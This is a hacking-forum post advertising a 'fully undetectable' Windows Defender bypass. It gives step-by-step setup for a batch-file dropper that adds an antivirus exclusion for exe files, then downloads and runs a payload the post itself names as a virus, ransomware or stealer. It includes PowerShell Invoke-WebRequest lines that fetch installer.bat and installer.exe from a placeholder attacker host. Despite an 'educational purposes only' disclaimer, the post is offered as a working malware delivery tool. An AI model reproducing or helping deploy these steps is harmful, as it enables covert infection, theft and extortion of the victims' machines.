• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Antivirus Bypass "WD"

Status
Not open for further replies.

Mallware

Leech
User
Joined
Sep 17, 2013
Messages
45
Reputation
0
Reaction score
50
Points
18
Credits
0
‎11 Years of Service‎
90%
Antivirus Bypass​

Fully undetectable bypass for Windows Defender and every other antivirus (FUD at the moment). Works by downloading a bat file that adds an exclusion for exe files, and then downloads your file and runs it.​

Antivirus Bypass
Fully undetectable bypass for Windows Defender and every other antivirus (FUD at the moment). Works by downloading a bat file that adds an exclusion for exe files, and then downloads your file and runs it.​

This project is intended for research/educational purposes only.​

Setup
If you already have a webserver, skip to step 2.​

1, To start setting up the bypass, you will need a webserver, you can create one by heading over to
This link is hidden for visitors. Please Log in or register now.
and creating an HTML, CSS & JS repl, after that, you will need to run the repl. It should then open up a website preview and give you the webserver URL above it.​

2, Upload the file you wish to execute (virus, ransomware, stealer, etc) to the webserver and rename the file to installer.exe.​

3, Edit line 31 in the installer.bat file:​

Powershell -Command "Invoke-Webrequest 'https://YOURSITE.COM/installer.exe' -OutFile installer.exe"
Change
This link is hidden for visitors. Please Log in or register now.
to your webserver URL. If you use replit, it should look like this:
This link is hidden for visitors. Please Log in or register now.

4, Upload the installer.bat to your webserver. 5, Edit line 4 in the main.bat file:​

Powershell -Command "Invoke-Webrequest 'https://YOURSITE.COM/installer.bat' -OutFile installer.bat"
Replace
This link is hidden for visitors. Please Log in or register now.
with your webserver URL and the path to the installer.bat file. If you use replit, it should look like this:
This link is hidden for visitors. Please Log in or register now.

6, Done. The file you would use to bypass windows defender would be main.bat. You can convert it to an executable but this will raise the number of detections. If this helped you, make sure to star this repository (;​

 ​

Download:​

To see this hidden content, you must like this content.
 
Status
Not open for further replies.
Back
Top